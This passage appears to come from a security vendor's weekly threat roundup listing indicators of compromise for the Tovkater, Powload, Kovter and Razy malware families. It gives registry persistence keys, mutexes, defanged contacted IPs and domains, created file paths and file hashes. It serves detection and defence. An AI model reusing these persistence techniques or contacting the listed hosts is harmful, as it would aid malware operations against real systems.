%APPDATA%\Microsoft\Windows\Cookies\RPE3LD3D.txt25
%APPDATA%\Microsoft\Windows\Cookies\RYU7B1BB.txt25
%APPDATA%\Microsoft\Windows\Cookies\RZ1EYTQG.txt25
%APPDATA%\Microsoft\Windows\Cookies\SCT1A3Q5.txt25
%APPDATA%\Microsoft\Windows\Cookies\SL2DQ447.txt25
%APPDATA%\Microsoft\Windows\Cookies\SUA0P3GL.txt25
%APPDATA%\Microsoft\Windows\Cookies\T28YM23R.txt25
%APPDATA%\Microsoft\Windows\Cookies\TC61OXS2.txt25
%APPDATA%\Microsoft\Windows\Cookies\TWNEP5LZ.txt25
%APPDATA%\Microsoft\Windows\Cookies\TX9TW6ML.txt25
%APPDATA%\Microsoft\Windows\Cookies\U5T0RELM.txt25
%APPDATA%\Microsoft\Windows\Cookies\UCPG9KND.txt25
%APPDATA%\Microsoft\Windows\Cookies\UD8XCJVS.txt25
%APPDATA%\Microsoft\Windows\Cookies\UGY2NFKJ.txt25
%APPDATA%\Microsoft\Windows\Cookies\UOVVJUXY.txt25
%APPDATA%\Microsoft\Windows\Cookies\UVFN9CGJ.txt25
%APPDATA%\Microsoft\Windows\Cookies\V6G9AWM4.txt25
%APPDATA%\Microsoft\Windows\Cookies\VFVD9E5C.txt25
%APPDATA%\Microsoft\Windows\Cookies\VK4YOOAG.txt25
%APPDATA%\Microsoft\Windows\Cookies\VP01LDK3.txt25
%APPDATA%\Microsoft\Windows\Cookies\VPK8RY5C.txt25
%APPDATA%\Microsoft\Windows\Cookies\VYUA6F7D.txt25
See JSON for more IOCs
File Hashes
  • 04a19e4e2d700292ba4ce5659e97413112bd079dacdbaf8a2387e6f6559dcba3
  • 117466b3e9dabd69d510d9e034eec875d9ca2ad9dbb8c5d123b388ac2a65ebbf
  • 17d23f910311aeb341ee348586bb212d1cddb70152bc4d1bc31ac579693d7741
  • 1b0573fb381b291b12cf7db4bfb6deb78e688c9c3076908e8581199169b8514a
  • 1c0c7d00ccfb9f12299fd7df7ec2ad497cb6c8fa60b903694f2d2bf54af7c30c
  • 278bc2f23ef0a5a79e36f1dca261bbf67f87aef637e76373061654353fc3f716
  • 33ba38fa1bfaab98c6ba48eb2a2fb3155b51118e9ef79642418e0903e2b2e008
  • 51390b6bde9196f7c0319c1253d08233202f6b4110b8c33557a2d2895f868769
  • 548c5b819c109a61e1ff6bc74bd43ad2702ed44e479dd6600da3bb9d5a9ca72e
  • 5b3cd274c3c0349f7d67238994e53e4a842a82e9e15905510a93b4d6643621e7
  • 611f34dcdcce11b0e48779e0fcfd950437614e603673903c8b342bdd2a34ce1a
  • 620e4f53e698c59971f4633cad4c7966f3432aeec0a6315b82a5dae8c13577c9
  • 6f6e53de5fb48c34cce494113f04e1b32d3dd85d8071023b2dff1febb1686c7f
  • 6fd63887adf0e0d4894d3b648e8be0d20474579f60138915b5e3e3a9761f43bc
  • 783a7e50bddf9b5c9547a8fabc7470fabdbe4410df76148dd6c5c81dfb7e6506
  • 7e7e09137fda05e6292d8d9646ab5bc18fd136b06aa77833819ccc46d79c4859
  • 7e9ab6bf4ee2141f4702e0cf4348340293c429416f7676c7946e940321220375
  • 8412cd2e7e60ac2d32bf43f350f8ce806876f54c2ed9b6d0f895179d289a1803
  • 84e0ad1b2d1ca15e2ea16d6d57b81a63af18f664b171ad9d144e710ad2e3cb75
  • 8786a734c5f7fccca5b87c04c5531bff6ec323a29860063c2ba31941706c83a3
  • 914960db7ffbdd3a5a5a98b740f724c0ab9469fcbdd547561622809e5d3c6396
  • 93ac57e8f8e341c84e25dd0c14f014d23f55e24a175b443f4cd399a086e70965
  • 98170c08d421f79a308074befb2c4e799db06e28ce10cea9d435c5868d1e6f36
  • 9d8dfe92711ea955120f4fdbb3b2d0cf37ff79ac74572c867c44da7d404213fa
  • a0903affbe9bd3176863d83a9e57808aa55a3ea8695d09dbbd2d8f3f1d22e812
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Tovkater-6956309-0


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\System\CurrentControlSet\Control\Session Manager 25
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
25
<HKLM>\SYSTEM\ControlSet001\Control\Session Manager 25
MutexesOccurrences
N/A-
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
caribz[.]club10
fruitnext[.]top9
mirraclez[.]club5
liquidmiracle[.]top4
SMILESAWAY[.]TOP3
duckandbear[.]top2
skycrimes[.]top2
fowlerfootball[.]top2
gratify[.]triobol[.]ru1
shipboard[.]dicier[.]ru1
giroboard[.]top1
skeleton[.]walforder[.]ru1
shadeunit[.]club1
strangerthingz[.]club1
Files and or directories createdOccurrences
imasrr13.exe22
%TEMP%\nsw2.tmp\nsJSON.dll3
%TEMP%\nso74D7.tmp\INetC.dll1
%TEMP%\nso74D7.tmp\nsJSON.dll1
%TEMP%\nso74D7.tmp\xantacla.exe1
%TEMP%\nsuC6AE.tmp\INetC.dll1
%TEMP%\nsuC6AE.tmp\nsJSON.dll1
%TEMP%\nsuC6AE.tmp\santacla.exe1
%TEMP%\nsj9A32.tmp\INetC.dll1
%TEMP%\nsj9A32.tmp\nsJSON.dll1
%TEMP%\nse1441.tmp\INetC.dll1
%TEMP%\nsj9A32.tmp\xantacla.exe1
%TEMP%\nse1441.tmp\nsJSON.dll1
%TEMP%\nse1441.tmp\santacla.exe1
%TEMP%\nsa3ED.tmp\INetC.dll1
%TEMP%\nsa3ED.tmp\nsJSON.dll1
%TEMP%\nsa3ED.tmp\xantacla.exe1
%TEMP%\nseEB6D.tmp\INetC.dll1
%TEMP%\nseEB6D.tmp\nsJSON.dll1
%TEMP%\nseEB6D.tmp\xantacla.exe1
%TEMP%\nskC2A9.tmp\INetC.dll1
%TEMP%\nskC2A9.tmp\nsJSON.dll1
%TEMP%\nskC2A9.tmp\santacla.exe1
%TEMP%\nsp547C.tmp\INetC.dll1
%TEMP%\nsp547C.tmp\nsJSON.dll1
See JSON for more IOCs
File Hashes
  • 0b1c46b5535b4fc30fd8d813255220d3715d0bd7623e094e684af13a1c12f579
  • 0d806734aacf391b1c304155e8f186d7c354c46d08b5f2cb70c2a6029dba2e0e
  • 1187cf65c782ea451e0a46f8e5ea18f8133cc209d58db1c08793bb086b96df4f
  • 21a9fb85cec099bdc2bf419b9bc07dbe6f9b1dc40b8e2853c119093706d1a3a8
  • 2e23eb71950087f2212e0e591fa462b1706571fe55c87454de7003de4a982d95
  • 30d525e4acb5cbd5dd5fe9508cb0cf053c4b0480ab53168e9a06e58c2e9b323b
  • 35dae148e6507526256336e36eb9858dcf17c73f86c332582cd53af43c887f0a
  • 368e24183133ba0c4a7fb06b255458754e6662d6be0df18f44b7304b7f1438d7
  • 3dc644f5a69d86aeab33c6879bb508b59049d17a74cca73f15b160578ee0a358
  • 42f86e50ca2180192d30c556d001cf8720d17094850164e811872f1c864f10cb
  • 43150f037e396e69ff8e1e1d1da7e33614f100fba6b6133a99174a8bcc56d8c5
  • 46e6b3d8c0cff0c9dca7ee7fae9b15c7b23865f546533ee00be0d594f6d03a40
  • 4b0232b305a8504700570c6e177d0c1815924031908f2f2d5fe61510174804c5
  • 52e70ec3517105cdabea6b3448d4568fbca560683e7e90070d0209ea1a002de7
  • 5b1a72a9d50e9e41662848965957cf3b537a923f12a02d022d7e40bc76d6a59d
  • 5f16228ceca9d4d628bcddf5da07ddd8140b19c3458ba287b5e0a9a4533929c9
  • 626f2dbe08fcf4192f709111ca3f2ce5975cb9ac7bac7b007158b8e74070c403
  • 62bae87f17d56c22f89ec9c41c2e3bf76139df7a4a4c710e088ec9483918cf9b
  • 63d3a47aa0f89009ecc37199d269c8c3184d32e0632c3f1c1857dafd2aee7ae4
  • 67b73d01d619d30bc56d0f772207df38b68a433b1050137bb93a54e746c1c34f
  • 67ffbd39d1ebbceb4936645c822a10b6b71dc289acd026b1b4259f01c2168e8f
  • 6c2eae55f0ff4cb79a53f932a481812c7b8c5d61ff0aadf47c4211d676cc97b4
  • 6d0f17cdc45a3867ec8c89ae3cf9ef2264b4889fc135417857e04d8109ec62ec
  • 7b4c241497ba6cef5a8abc35d4c795e7c8b0b3d4a292a843d14d4389ddef57b7
  • 7dbb52a1de75d201b0565062452e81a210cc597ac4626aa95bf478562aa082cd
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Doc.Downloader.Powload-6956274-0


Indicators of Compromise


Registry KeysOccurrences
<HKCR>\INTERFACE\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} 29
<HKCR>\INTERFACE\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} 29
<HKCR>\INTERFACE\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} 29
<HKCR>\INTERFACE\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} 29
<HKCR>\INTERFACE\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} 29
<HKCR>\INTERFACE\{79176FB2-B7F2-11CE-97EF-00AA006D2776} 29
<HKCR>\INTERFACE\{4C5992A5-6926-101B-9992-00000B65C6F9} 29
<HKCR>\INTERFACE\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} 29
<HKCR>\INTERFACE\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{5CEF5613-713D-11CE-80C9-00AA00611080} 29
<HKCR>\INTERFACE\{92E11A03-7358-11CE-80CB-00AA00611080} 29
<HKCR>\INTERFACE\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} 29
<HKCR>\INTERFACE\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} 29
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\sourcebulk 29
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: Type
29
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: Start
29
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: ErrorControl
29
MutexesOccurrences
Global\I98B68E3C29
Global\M98B68E3C29
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
159[.]0[.]130[.]14929
191[.]92[.]69[.]11529
69[.]25[.]11[.]2829
88[.]198[.]20[.]5729
212[.]129[.]63[.]13224
198[.]58[.]114[.]9118
74[.]208[.]5[.]1516
209[.]85[.]144[.]10910
77[.]111[.]149[.]559
74[.]6[.]141[.]508
173[.]201[.]192[.]2298
74[.]208[.]5[.]27
209[.]85[.]144[.]1087
17[.]36[.]205[.]747
182[.]50[.]145[.]36
67[.]195[.]228[.]956
196[.]35[.]198[.]1346
54[.]88[.]144[.]2116
149[.]255[.]56[.]2426
184[.]106[.]54[.]105
64[.]26[.]60[.]2295
173[.]203[.]187[.]145
205[.]178[.]146[.]2355
212[.]227[.]15[.]1675
212[.]227[.]15[.]1835
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ises[.]com[.]pl29
ingenla[.]com29
hicast[.]tn24
smtp[.]mail[.]com16
secure[.]emailsrvr[.]com14
smtpout[.]secureserver[.]net14
smtp[.]office365[.]com13
smtp-mail[.]outlook[.]com10
smtp[.]1und1[.]de10
smtp[.]aol[.]com8
smtp[.]emailsrvr[.]com7
smtpout[.]asia[.]secureserver[.]net6
smtp[.]1and1[.]com6
smtp[.]rediffmailpro[.]com6
smtp[.]comcast[.]net6
smtp[.]263[.]net6
spam[.]pantos[.]com6
mail[.]longi-silicon[.]com5
smtp[.]prodigy[.]net[.]mx5
mail[.]huaqin[.]com5
betmngr[.]com5
smtp[.]yandex[.]com4
smtp[.]zoho[.]com4
smtp3[.]netcore[.]co[.]in4
smtp[.]mweb[.]co[.]za4
See JSON for more IOCs
Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat29
%HOMEPATH%\423.exe29
%SystemRoot%\SysWOW64\version.dll1
%SystemRoot%\Globalization\Sorting\sortdefault.nls1
\REGISTRY\MACHINE\SOFTWARE\Classes\Word.Document.81
%TEMP%\CVR90.tmp1
%SystemRoot%\SysWOW64\sourcebulka.exe1
%SystemRoot%\SysWOW64\3HqWfmuWUBgMP.exe1
%SystemRoot%\Temp\76D.tmp1
%SystemRoot%\SysWOW64\jq9Mk4Che.exe1
File Hashes
  • 1e0b73c5ec4b9516709c10ec708fc295df021451f958a89144d79d99604b3664
  • 325701284bf17203d71a9c5b4d46e4f7b651164ab92c643fe64a3e3bc2844dad
  • 3537f5cfc0ad20b8061b67f82dc43a7ac1856391bece8158023fcc3d6699f75a
  • 35965e3b9cff6a78e1331ed07f5e327a91301b5b023b20fb0c107bc3574b3a08
  • 3889458cad2eccfcd7f8ec5c842dd30edec24f36a37abde0e9359dd7117524e7
  • 3eb7c725b886abf672613a63d1c17c479f1144f1262a6c3cd66a44fe74581383
  • 407f21c8583dbf70a0069162b9f7c0ec142b63e05d4d94ec8e4c85345bf759d9
  • 51ee3cc17fa697ec7de8a60ea5ad2af4195de73c95401b1b17e7b9c346ed9c1a
  • 5a33cba1e854fb298486fe6ba6ebb071e045cb698aec109561178b2a66567662
  • 5eefdd75abcd812db0c1fe74f071dcb2c50ac7c9b73144900b9918fe8930af2b
  • 601804d1434691765b258649f0a9c8924bb1b28b5ff0dc2bafb3039b2c78f6a3
  • 65344e20c9e346e62bec15f369fcdbb619d64b362483feb36a6d60e3007c22db
  • 6f5795d34e8fa33548042554f0b05b6e79e9a68783f28a196476261a0de0e068
  • 72966d743059492c8caf5689758cdf98275e087cf5bf9d0e7914db1e4472fc05
  • 751ccbeabee910ea022ebc97fde11d5e1c3bba9f83b6d2df09a927924eb1e60e
  • 77ccc470c377e4a22e0091d0abd3f91cec17b6e06c0e17d8f87dbbbd735bfe0b
  • 7bfa867554a7f1a6a891712cfdaaf519bd44bdf53e0047930890495c9655ab7e
  • 8391f3706e60079dbdbeee083f8bda85915cc763bd683bb00270f694a031c66a
  • 9e40d6af4d13a6d65e179c109b4676c691fbf0b2de6deb0d84625e654989fa0d
  • 9fe28f27c0db9df3580f65069affb7f47171d910f69035ffdeeac5a545ab4ec9
  • a1be08364eef857af56f506b206e780c803c212b76dbac8dc17e7983d08f65ff
  • a50d314e9c13d667641b11c73695980d1fd4cc0020cd7f760bdbd88bf95b1c3c
  • a95ddd15ef6f38762fbc16ca31539aabbf15c3c10d0c103cb4c204c88bfbbadf
  • ac957b3a3b4e8d75ead5dabd4b70e28e27a697a719322071d66cfb796d3b28f6
  • b1709a55b71ba9559aa839eb5304e2fc2388ae6275771b6cbbf8f49ac3e355fa
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Dropper.Kovter-6956146-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: internat.exe
25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
Value Name: DisableOSUpgrade
25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
Value Name: ReservationsAllowed
25
<HKLM>\SOFTWARE\WOW6432NODE\XVYG
Value Name: xedvpa
25
<HKCU>\SOFTWARE\XVYG
Value Name: xedvpa
25
<HKCR>\.8CA9D79 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: vrxzdhbyv
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ssishoff
25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUpgrade 25
<HKCU>\SOFTWARE\xvyg 25
<HKLM>\SOFTWARE\WOW6432NODE\xvyg 25
<HKCR>\c3b616 25
<HKCR>\C3B616\shell 25
<HKCR>\C3B616\SHELL\open 25
<HKCR>\C3B616\SHELL\OPEN\command 25
<HKCR>\.8ca9d79 25
<HKU>\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION 25
<HKLM>\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\XVYG
Value Name: tnzok
25
MutexesOccurrences
EA4EC370D1E573DA25
A83BAA13F950654C25
Global\7A7146875A8CDE1E25
B3E8F6F86CDD9D8B25
\BaseNamedObjects\408D8D94EC4F66FC24
\BaseNamedObjects\Global\350160F4882D1C9824
\BaseNamedObjects\053C7D611BC8DF3A24
\BaseNamedObjects\Global\9F84EBC0DC30D3FA1
\BaseNamedObjects\CF2F399CCFD463691
\BaseNamedObjects\8450CD062CD6D8BB1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
107[.]160[.]89[.]932
123[.]94[.]5[.]731
6[.]179[.]232[.]2091
132[.]130[.]129[.]2021
87[.]221[.]222[.]1761
222[.]187[.]133[.]2381
126[.]207[.]27[.]581
191[.]12[.]150[.]1891
92[.]253[.]215[.]1241
53[.]136[.]182[.]721
188[.]232[.]142[.]2361
75[.]134[.]228[.]1371
15[.]17[.]189[.]2141
218[.]10[.]226[.]1841
160[.]60[.]207[.]381
107[.]98[.]132[.]1131
134[.]68[.]158[.]41
56[.]177[.]25[.]241
52[.]196[.]162[.]1381
133[.]251[.]164[.]1061
108[.]118[.]74[.]1421
33[.]198[.]16[.]91
18[.]75[.]88[.]1341
58[.]184[.]135[.]771
77[.]189[.]216[.]1941
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
www[.]cloudflare[.]com1
bleez[.]com[.]br1
lojadeunatelha[.]com[.]br1
revenda[.]lojadeunatelha[.]com[.]br1
easyfax[.]nrtnortheast[.]com1
www[.]username[.]n[.]nu1
www[.]n[.]nu1
staticjw[.]com1
www[.]acquia[.]com1
network[.]acquia[.]com1
Files and or directories createdOccurrences
%LOCALAPPDATA%\4dd3cc\519d0f.bat25
%LOCALAPPDATA%\4dd3cc\8e9866.8ca9d7925
%LOCALAPPDATA%\4dd3cc\d95adb.lnk25
%APPDATA%\b08d66\0b3c0b.8ca9d7925
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\Preferred25
%LOCALAPPDATA%\4dd3cc25
%APPDATA%\b08d6625
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\91b4e5.lnk25
%APPDATA%\db7a\c227.a778324
%HOMEPATH%\Local Settings\Application Data\f4fa\97ea.lnk24
%HOMEPATH%\Local Settings\Application Data\f4fa\c0ce.bat24
%HOMEPATH%\Local Settings\Application Data\f4fa\d5a9.a778324
%HOMEPATH%\Start Menu\Programs\Startup\d733.lnk24
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\desktop.ini3
%APPDATA%\Microsoft\Windows\Cookies\S2KTL2FI.txt2
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\83549e0e-3d04-434f-8fd8-6118f60c376b2
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\83549e0e-3d04-434f-8fd0-5619f60c376b2
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\83549e0e-3d04-434f-8fdf-6619f60c376b2
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\1E8X74FH.htm2
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\83549e0e-3d04-434f-8fdf-5e19f60c376b2
%APPDATA%\Microsoft\Windows\Cookies\0TSDIW0B.txt1
%APPDATA%\Microsoft\Windows\Cookies\UGH0HZQB.txt1
%APPDATA%\Microsoft\Windows\Cookies\ZLTD4G06.txt1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\83549e0e-3d04-434f-8fd2-6219f60c376b1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\83549e0e-3d04-434f-8fdd-6619f60c376b1
See JSON for more IOCs
File Hashes
  • 0699fc68be026ed52555783f4ca395dcd68dd93898e9ee1756e0ffe9493c300a
  • 06a3a8ebf6965042378a003857434f775a014293830a3d02d468b02b02f13329
  • 0826313d6cdb1c85d39edf77f5faeaff0241f09a8bc6ad8ea4453cab46628dd6
  • 2adfbe4ebd34d062e774d20d300e80ec31cdf4d59b018be2a45e644341c55f97
  • 2e7aa46acaacad3f7e1675d3090ae7669efcffb91beb976cdf93d69782fe5453
  • 2fbdb93de7475386719d620bd685b955ec05cca0f458579daa9932023351040b
  • 31d170788a623341e4d6636e1dec87b9812a1967441415bcb8097d3b4a4bdfee
  • 3337a63c7f42977759f9a961af5c7265abfe0489d68c48f90d066b40d84c0ddd
  • 3754208c5f620f262726467daac435fbcc3a262dde1620c876b72459750fc90d
  • 39b74f9fad057cc9603e2a7a716236c9671dc08abdf7e64c37ef2d2b53acf691
  • 4297d27c8909c9c40b311827f40bf195ffbb6c1ee8bef5f9203465cb10cab9bc
  • 477c74758b4c59334fcdb2051089efbe191d2cda4252aecea59b13bb93bfb101
  • 4802c24fcb2d97233d22b26077714ca09fe47f6602586da0f96965af41adecb6
  • 4be5d24a7846b4ef102b47c0488140194b49c145353259fc581fa0da4068d84a
  • 4e3b31344f80b1693ee28cedb5109a9a4e522c8ef225f6087e480954fa76b3d6
  • 5061a14b94f0794e79e4cc57a49a38c422cf30171df07282a5de10fbac455b01
  • 50939d9ddcc87d1d2e8a3c81a7683b42beeb86471fd2e4da903f062086203d5e
  • 58f3ac23dd98672c20e01c5963b11fba8b077031c7ac41f156a37d2306b812aa
  • 66d2f5f39b4fbb1cab2a4c23d696add166f6dec3ae4dcba20a1c2f89b35d4b08
  • 7199c5b3a081ae13f6b6fc457196f62ecaf3240b39b728f1255f9d3ccc86f853
  • 812e4481d2e23732e41d4e58cd19eccbd53fceba8273ea9bbd1bcaf3da13766f
  • 822bf74cf43fdfd74ef7edd6a4c52dc2ca32dd8a866afbdbd4ae933cd531dd6e
  • 8580001fd28261a74f92594fe42a01012e202e3322a35004857b6881fa73ee9a
  • 8e9f427bca537dfa11df3360b71788dc2dd70cfad927d852094f1c07e8cf2c64
  • 94ff1192ecf870614b1f98103ade1ba1ad46153ddeb8a0c3a07a76ab4461e377
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Win.Trojan.Razy-6956092-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: internat.exe
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\avkaxoq 19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: Type
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: Start
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: ErrorControl
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: ImagePath
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: DisplayName
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: DependOnService
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: DependOnGroup
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: WOW64
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: ObjectName
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\aqejpwsx 6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: Type
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: Start
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ErrorControl
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ImagePath
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DisplayName
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DependOnService
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DependOnGroup
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: WOW64
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ObjectName
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mrldn
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ovsuw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: twgqm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: eqlshtrx
1
MutexesOccurrences
llzeou25
Global\amztgg19
amztgga19
Global\eqfik6
eqfika6
\BaseNamedObjects\eucofa1
003c194a95c7849375590c48f1c5bc5fÐ÷XAdministra1
02b5f67a3eba31421dc595a7efed8e0a1
0e390dd0547334471c08c3b8b4e7ec3aÐ÷IAdministra1
087ddce345ea3ed2fed8d02dd466026cÐ÷QAdministra1
14a95d66f90495fcc278258097ed704aÐ÷ Administra1
10435b4efc8049d260d4b36673f7d656Ð÷.Administra1
1dd13f0648a70754c883c6262c3633c1Ð÷CAdministra1
3afec20c013fca0abef646a7a6f0f5cdÐ÷dAdministra1
385f6390936d000f4d9db3e30b117aca1
3dede5abeacdabc758f70beef2984aca1
3f61be1a4bcb773c48a6dc7ed4898387Ð÷:Administra1
401b399a3aa67d42306ce7291299b7f2Ð÷6Administra1
897b0a510174cbc4757982703e42a0ca1
76097734f64ce5ae9b008273431fa4c8Ð÷9Administra1
8ae8d944960e54c7a833875f71bdae62Ð÷2Administra1
88cb1af973183aa93bf10d74440333b6Ð÷/Administra1
\BaseNamedObjects\380065180a1
\BaseNamedObjects\getnia1
\BaseNamedObjects\xabzsenoa1
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Amztggm19
%APPDATA%\Microsoft\Amztggm\amztg.dll19
%APPDATA%\Microsoft\Amztggm\amztgg.exe19
%TEMP%\~amztgg.tmp19
%APPDATA%\Microsoft\Eqfikq6
%APPDATA%\Microsoft\Eqfikq\eqfi.dll6
%APPDATA%\Microsoft\Eqfikq\eqfik.exe6
%TEMP%\~eqfik.tmp6
%APPDATA%\Microsoft\Ilgqyl\ilgqy.exe1
%APPDATA%\Microsoft\Duazxlbu\duazxl.dll1
%APPDATA%\Microsoft\Duazxlbu\duazxlb.exe1
%APPDATA%\Microsoft\Jeofze\jeof.dll1
%APPDATA%\Microsoft\Jeofze\jeofz.exe1
%APPDATA%\Microsoft\Ssfsns\ssfs.dll1
%APPDATA%\Microsoft\Ssfsns\ssfsn.exe1
%APPDATA%\Microsoft\Dcpptfmac\dcpptfm.dll1
%APPDATA%\Microsoft\Dcpptfmac\dcpptfma.exe1
%APPDATA%\Microsoft\Taozsa\taoz.dll1
%APPDATA%\Microsoft\Taozsa\taozs.exe1
%APPDATA%\Microsoft\Eucofu\euco.dll1
%APPDATA%\Microsoft\Eucofu\eucof.exe1
%APPDATA%\Microsoft\Getnie\getn.dll1
%APPDATA%\Microsoft\Getnie\getni.exe1
%APPDATA%\Microsoft\Xabzsenoa\xabzsen.dll1
